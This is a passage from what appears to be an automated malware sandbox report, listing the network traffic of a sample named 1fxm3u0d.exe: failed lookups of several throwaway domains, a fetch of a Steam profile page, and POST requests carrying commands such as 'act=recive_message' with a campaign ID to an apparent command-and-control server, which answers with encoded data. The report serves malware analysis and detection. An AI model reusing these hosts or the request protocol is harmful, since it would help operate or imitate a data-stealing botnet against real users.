Dec 18, 2024 11:33:21.982899904 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:21.984411955 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:21.984422922 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:21.984664917 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:21.986027956 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:21.986134052 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:21.986140966 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:22.733808041 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:22.733915091 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:22.734150887 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:22.734358072 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:22.734376907 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:23.188983917 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:23.189032078 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:23.189105034 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:23.189443111 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:23.189457893 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.402242899 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.402350903 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.403485060 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.403513908 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.403769016 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.404982090 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.405747890 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.405797005 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.405945063 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.405992985 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.406133890 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.406184912 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.406378984 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.406426907 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.406661034 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.406712055 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.406927109 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.406970024 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.406996012 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.407025099 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.407175064 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.407222033 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.407255888 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.407294035 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.407408953 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.447374105 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.447626114 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.447746038 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.447798967 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.447841883 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:24.447923899 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:24.447962999 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:29.333754063 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:29.333837986 CET	443	49738	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:29.334176064 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:29.334220886 CET	49738	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:29.378937960 CET	49758	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:29.378981113 CET	443	49758	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:29.379074097 CET	49758	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:29.379456043 CET	49758	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:29.379467964 CET	443	49758	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:30.409861088 CET	49758	443	192.168.2.5	104.21.66.86

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:32:58.450788975 CET	56695	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:58.674860001 CET	53	56695	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:58.679311037 CET	55811	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:58.897387028 CET	53	55811	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:58.902357101 CET	54162	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:59.121304035 CET	53	54162	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:59.131331921 CET	51538	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:59.348119020 CET	53	51538	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:59.349775076 CET	59548	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:59.574557066 CET	53	59548	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:59.578042984 CET	64227	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:32:59.807142019 CET	53	64227	1.1.1.1	192.168.2.5
Dec 18, 2024 11:32:59.810076952 CET	65373	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:33:00.034061909 CET	53	65373	1.1.1.1	192.168.2.5
Dec 18, 2024 11:33:00.036958933 CET	49546	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:33:00.351340055 CET	53	49546	1.1.1.1	192.168.2.5
Dec 18, 2024 11:33:00.354665995 CET	55120	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:33:00.573503971 CET	53	55120	1.1.1.1	192.168.2.5
Dec 18, 2024 11:33:00.586338043 CET	63190	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:33:00.725975037 CET	53	63190	1.1.1.1	192.168.2.5
Dec 18, 2024 11:33:03.246649981 CET	63682	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:33:03.384676933 CET	53	63682	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 11:32:58.450788975 CET	192.168.2.5	1.1.1.1	0x9e22	Standard query (0)	thighpecr.cyou	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:58.679311037 CET	192.168.2.5	1.1.1.1	0x105a	Standard query (0)	seallysl.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:58.902357101 CET	192.168.2.5	1.1.1.1	0x1ee6	Standard query (0)	opposezmny.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.131331921 CET	192.168.2.5	1.1.1.1	0xc228	Standard query (0)	goalyfeastz.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.349775076 CET	192.168.2.5	1.1.1.1	0xe1bf	Standard query (0)	contemteny.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.578042984 CET	192.168.2.5	1.1.1.1	0xdc76	Standard query (0)	dilemmadu.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.810076952 CET	192.168.2.5	1.1.1.1	0xf4a2	Standard query (0)	faulteyotk.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.036958933 CET	192.168.2.5	1.1.1.1	0xe305	Standard query (0)	authorisev.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.354665995 CET	192.168.2.5	1.1.1.1	0xb0fa	Standard query (0)	servicedny.site	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.586338043 CET	192.168.2.5	1.1.1.1	0x2114	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:03.246649981 CET	192.168.2.5	1.1.1.1	0xefe5	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 11:32:58.674860001 CET	1.1.1.1	192.168.2.5	0x9e22	Name error (3)	thighpecr.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:58.897387028 CET	1.1.1.1	192.168.2.5	0x105a	Name error (3)	seallysl.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.121304035 CET	1.1.1.1	192.168.2.5	0x1ee6	Name error (3)	opposezmny.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.348119020 CET	1.1.1.1	192.168.2.5	0xc228	Name error (3)	goalyfeastz.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.574557066 CET	1.1.1.1	192.168.2.5	0xe1bf	Name error (3)	contemteny.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:32:59.807142019 CET	1.1.1.1	192.168.2.5	0xdc76	Name error (3)	dilemmadu.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.034061909 CET	1.1.1.1	192.168.2.5	0xf4a2	Name error (3)	faulteyotk.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.351340055 CET	1.1.1.1	192.168.2.5	0xe305	Name error (3)	authorisev.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.573503971 CET	1.1.1.1	192.168.2.5	0xb0fa	Name error (3)	servicedny.site	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:00.725975037 CET	1.1.1.1	192.168.2.5	0x2114	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:03.384676933 CET	1.1.1.1	192.168.2.5	0xefe5	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:33:03.384676933 CET	1.1.1.1	192.168.2.5	0xefe5	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	23.55.153.106	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:02 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-18 10:33:02 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 18 Dec 2024 10:33:02 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=0e8e5a237ebc8136366e9246; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 10:33:02 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 10:33:03 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 10:33:03 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:04 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-18 10:33:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 10:33:08 UTC	1035	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rd0l120js5vdp280usc9a47p5m; expires=Sun, 13-Apr-2025 04:19:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4O5awnt9PD7TIp9sGKBzRayt%2FldMqcc%2Fq%2BSv2U3X6L13K1tiWIX1DCgnC5BN1SfBkWbIfkD4yoKx1xxn9G4Bbz43kRtf5wtnCg0uHnLdTnuyx92zYflBywdxN56Mip3ehk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e1dae7419bf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2236&min_rtt=2103&rtt_var=884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1388492&cwnd=211&unsent_bytes=0&cid=2b42aaef7dbd949a&ts=4214&x=0"
2024-12-18 10:33:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 10:33:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:10 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: lev-tolstoi.com
2024-12-18 10:33:10 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 55 6e 69 71 75 65 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--Unique&j=
2024-12-18 10:33:11 UTC	1045	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5llfi2e8i3h6etiohtm28ukcjp; expires=Sun, 13-Apr-2025 04:19:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=we%2BLeDuvlYrD8S%2BJwKONMJEgAUJBUf%2FE%2FoZl%2Fb%2B1yx20lEso2U2uPkoaNzxk7Ci3z5dAS11loG8MMz%2BHcEkFXCke2QZxOQzxXGTojoftsT42iIuqbdQlIXT%2BgkTwC93jOLc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e41ca510fa4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1528&rtt_var=584&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=947&delivery_rate=1855146&cwnd=176&unsent_bytes=0&cid=d4edbed7611e196b&ts=1048&x=0"
2024-12-18 10:33:11 UTC	324	IN	Data Raw: 31 64 33 35 0d 0a 30 71 64 51 44 45 41 36 48 2b 64 2f 50 6b 4e 55 62 63 78 39 35 59 41 6e 6d 68 56 55 32 54 59 4d 4a 6d 39 63 48 6c 6f 6a 58 6c 36 70 68 53 59 75 65 67 34 7a 78 51 78 62 59 57 34 5a 76 67 69 41 72 41 58 37 63 58 62 6a 55 47 31 4b 48 44 6b 79 65 46 55 7a 66 4f 6a 42 4d 57 41 7a 58 7a 50 46 47 6b 5a 68 62 6a 61 33 58 34 44 75 42 61 41 33 4d 62 4e 55 62 55 6f 4e 50 58 55 31 55 7a 49 39 75 73 73 33 5a 43 56 5a 65 34 59 54 55 79 59 78 43 4b 30 58 69 2b 6c 4b 38 6e 68 32 39 52 52 70 58 45 31 6d 50 42 64 47 4b 6a 2b 66 78 69 4e 6e 59 6b 63 7a 6e 46 31 62 4c 58 5a 58 37 68 79 41 34 6b 76 38 63 54 2b 78 58 6d 52 43 44 44 68 30 4b 6b 6f 34 4e 72 72 46 4e 47 55 76 55 47 2b 4c 47 56 51 74 4e 77 4b 74 58 38 6d 69 51 75 41 33 62 76 73 48 58 45 63 63 4c Data Ascii: 1d350qdQDEA6H+d/PkNUbcx95YAnmhVU2TYMJm9cHlojXl6phSYueg4zxQxbYW4ZvgiArAX7cXbjUG1KHDkyeFUzfOjBMWAzXzPFGkZhbja3X4DuBaA3MbNUbUoNPXU1UzI9uss3ZCVZe4YTUyYxCK0Xi+lK8nh29RRpXE1mPBdGKj+fxiNnYkcznF1bLXZX7hyA4kv8cT+xXmRCDDh0Kko4NrrFNGUvUG+LGVQtNwKtX8miQuA3bvsHXEccL
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 2f 66 6f 6d 58 6f 64 44 57 76 57 58 38 45 45 6e 42 6c 65 45 59 77 66 4f 69 46 4e 47 41 6a 56 58 32 58 46 56 63 71 4d 78 32 6c 46 6f 72 76 52 66 56 39 4f 62 68 55 61 55 34 48 4d 58 59 38 54 44 45 36 73 4d 56 79 49 47 4a 66 5a 63 56 46 48 41 49 7a 48 36 6b 54 6b 61 42 2f 75 47 68 34 6f 68 52 70 53 45 31 6d 50 44 42 45 50 7a 2b 37 79 6a 46 6d 4b 55 70 39 6c 78 74 52 4a 43 51 4a 71 78 47 4e 34 56 66 79 65 54 43 34 58 57 56 4e 43 44 6c 34 65 41 39 38 4f 36 69 46 61 69 34 44 56 58 61 4a 46 30 73 68 64 68 44 67 42 73 66 6c 53 62 67 76 64 72 39 56 61 6b 55 4a 4d 48 49 38 54 54 6f 79 76 63 6f 30 5a 43 4a 66 64 34 30 56 58 53 77 39 41 4b 34 61 69 75 5a 44 39 48 59 7a 2b 78 6f 75 51 78 56 2b 4a 48 68 76 4f 7a 2b 69 68 77 64 74 4c 46 5a 36 6b 31 31 44 62 79 39 50 71 Data Ascii: /fomXodDWvWX8EEnBleEYwfOiFNGAjVX2XFVcqMx2lForvRfV9ObhUaU4HMXY8TDE6sMVyIGJfZcVFHAIzH6kTkaB/uGh4ohRpSE1mPDBEPz+7yjFmKUp9lxtRJCQJqxGN4VfyeTC4XWVNCDl4eA98O6iFai4DVXaJF0shdhDgBsflSbgvdr9VakUJMHI8TToyvco0ZCJfd40VXSw9AK4aiuZD9HYz+xouQxV+JHhvOz+ihwdtLFZ6k11Dby9Pq
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 4e 2f 58 59 38 73 52 51 67 42 41 6f 6d 50 47 41 42 44 53 75 37 68 77 64 74 4c 46 5a 36 6b 31 31 44 62 79 39 50 71 52 50 48 75 67 58 31 66 7a 4f 2b 57 32 39 4f 41 7a 74 32 4e 45 6b 79 50 36 4c 4b 4e 6d 34 75 55 48 65 49 45 31 67 70 50 77 53 6c 47 59 66 6a 54 37 67 35 64 72 78 4d 4c 68 78 4e 43 6e 73 30 54 44 4e 2b 68 63 59 38 59 43 56 4f 50 5a 70 54 52 57 45 78 41 2b 35 48 78 2b 35 4d 2b 48 77 38 76 31 52 70 53 51 67 39 65 7a 74 4d 4f 7a 61 2b 77 6a 5a 69 4b 31 56 37 68 52 70 59 4a 43 51 4b 70 78 4f 4c 6f 67 75 34 63 43 37 37 44 43 35 72 43 69 68 2f 46 30 49 74 4e 66 44 61 66 48 64 69 58 33 48 46 52 52 77 6d 4d 77 65 6c 47 59 2f 69 56 2f 31 35 50 62 70 65 61 45 55 41 4d 6e 6f 34 51 44 77 36 76 4d 55 31 61 54 42 4b 65 49 4d 50 56 6d 46 34 54 36 6b 48 78 37 Data Ascii: N/XY8sRQgBAomPGABDSu7hwdtLFZ6k11Dby9PqRPHugX1fzO+W29OAzt2NEkyP6LKNm4uUHeIE1gpPwSlGYfjT7g5drxMLhxNCns0TDN+hcY8YCVOPZpTRWExA+5Hx+5M+Hw8v1RpSQg9eztMOza+wjZiK1V7hRpYJCQKpxOLogu4cC77DC5rCih/F0ItNfDafHdiX3HFRRwmMwelGY/iV/15PbpeaEUAMno4QDw6vMU1aTBKeIMPVmF4T6kHx7
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 64 75 4d 55 62 55 73 45 4d 58 51 77 54 6a 4d 34 76 73 4d 30 59 79 64 58 64 35 63 56 55 69 77 39 41 4b 55 4e 68 2b 39 42 39 48 4d 2b 73 46 34 75 43 6b 30 35 5a 48 67 5a 66 41 6d 39 79 6a 4a 74 4e 42 68 69 79 77 51 63 4a 6a 70 50 39 6c 2b 4c 37 45 58 33 65 7a 71 77 58 47 39 49 41 7a 6c 35 4d 55 6b 30 4c 72 48 42 4f 6d 38 73 56 33 79 42 47 46 6b 6c 4d 51 75 6f 45 4d 65 73 42 66 39 76 64 75 4d 55 51 57 4d 34 66 46 30 43 41 53 4e 79 71 59 55 31 59 6d 49 41 50 59 6b 65 55 43 6b 35 43 61 63 54 6a 65 74 4f 39 48 77 79 74 31 31 72 51 67 77 37 65 54 6c 46 4d 44 61 32 78 6a 46 68 4c 56 64 31 78 56 4d 63 4a 69 35 50 39 6c 2b 69 39 55 37 32 63 58 61 6b 47 6e 63 45 43 6a 49 38 59 41 45 77 4e 62 62 44 4e 32 49 6a 58 6e 57 41 46 56 67 67 4d 41 6d 74 45 49 50 6e 52 50 64 Data Ascii: duMUbUsEMXQwTjM4vsM0YydXd5cVUiw9AKUNh+9B9HM+sF4uCk05ZHgZfAm9yjJtNBhiywQcJjpP9l+L7EX3ezqwXG9IAzl5MUk0LrHBOm8sV3yBGFklMQuoEMesBf9vduMUQWM4fF0CASNyqYU1YmIAPYkeUCk5CacTjetO9Hwyt11rQgw7eTlFMDa2xjFhLVd1xVMcJi5P9l+i9U72cXakGncECjI8YAEwNbbDN2IjXnWAFVggMAmtEIPnRPd
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 32 31 57 44 44 4e 33 4b 6b 59 7a 4f 4c 66 4a 4e 47 45 6b 57 58 69 50 45 56 73 6b 50 51 43 69 58 38 6d 69 51 75 41 33 62 76 74 36 5a 56 63 61 50 58 49 7a 56 79 64 38 72 34 73 72 4c 69 56 55 50 64 31 64 58 79 6f 39 43 36 34 54 68 2b 5a 49 2b 47 55 35 76 46 4e 6e 54 78 38 30 65 7a 39 4b 4e 44 65 2f 77 79 42 69 4c 45 70 34 6c 77 38 63 62 33 59 49 74 6c 2f 66 6f 6e 50 2f 5a 79 61 34 46 6c 39 53 44 69 68 33 4e 55 31 38 49 2f 37 63 63 6d 6b 75 47 43 58 46 47 31 4d 6f 4e 51 43 76 46 6f 76 76 51 50 46 79 4e 37 31 51 5a 45 34 4e 4f 48 6f 35 52 44 59 2f 73 63 38 37 61 53 70 66 66 70 64 64 45 6d 45 78 46 2b 35 48 78 38 74 43 36 6e 6b 6d 2b 30 73 67 58 55 30 35 63 48 67 5a 66 44 69 36 79 6a 5a 70 4c 6c 35 34 67 